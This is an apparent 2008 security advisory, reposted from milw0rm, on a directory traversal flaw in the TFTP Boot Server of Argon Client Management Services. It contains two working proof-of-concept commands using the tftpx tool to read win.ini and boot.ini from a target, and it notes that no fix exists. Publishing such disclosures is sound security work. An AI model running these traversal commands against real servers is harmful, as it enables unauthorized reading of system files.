77 lines
No EOL
1.7 KiB
Text
77 lines
No EOL
1.7 KiB
Text
#######################################################################
|
|
|
|
Luigi Auriemma
|
|
|
|
Application: Argon Client Management Services
|
|
http://www.argontechnology.com/product.aspx/cid1/43
|
|
Versions: <= 1.31 (TFTP Boot Server <= 2.5.3.1)
|
|
Platforms: Windows
|
|
Bug: directory traversal in TFTP Boot Server
|
|
Exploitation: remote
|
|
Date: 08 Mar 2008
|
|
Author: Luigi Auriemma
|
|
e-mail: aluigi@autistici.org
|
|
web: aluigi.org
|
|
|
|
|
|
#######################################################################
|
|
|
|
|
|
1) Introduction
|
|
2) Bug
|
|
3) The Code
|
|
4) Fix
|
|
|
|
|
|
#######################################################################
|
|
|
|
===============
|
|
1) Introduction
|
|
===============
|
|
|
|
|
|
>From vendor's website:
|
|
"Client Management Services® (CMS) includes all the server-based
|
|
services (PXE Server, BOOTP Server) and administration tools needed to
|
|
setup an open network boot environment. You can deploy your favorite
|
|
third party client management tools in a pre-OS booting phase."
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
2) Bug
|
|
======
|
|
|
|
|
|
The TFTP Boot Server is affected by a classical directory traversal
|
|
vulnerability which allows an attacker to download (upload is not
|
|
allowed) any file from the disk where is located the tftp folder.
|
|
|
|
|
|
#######################################################################
|
|
|
|
===========
|
|
3) The Code
|
|
===========
|
|
|
|
|
|
http://aluigi.org/testz/tftpx.zip
|
|
|
|
tftpx SERVER ../../windows/win.ini none
|
|
tftpx SERVER ..\boot.ini none
|
|
|
|
|
|
#######################################################################
|
|
|
|
======
|
|
4) Fix
|
|
======
|
|
|
|
|
|
No fix
|
|
|
|
|
|
#######################################################################
|
|
|
|
# milw0rm.com [2008-03-10] |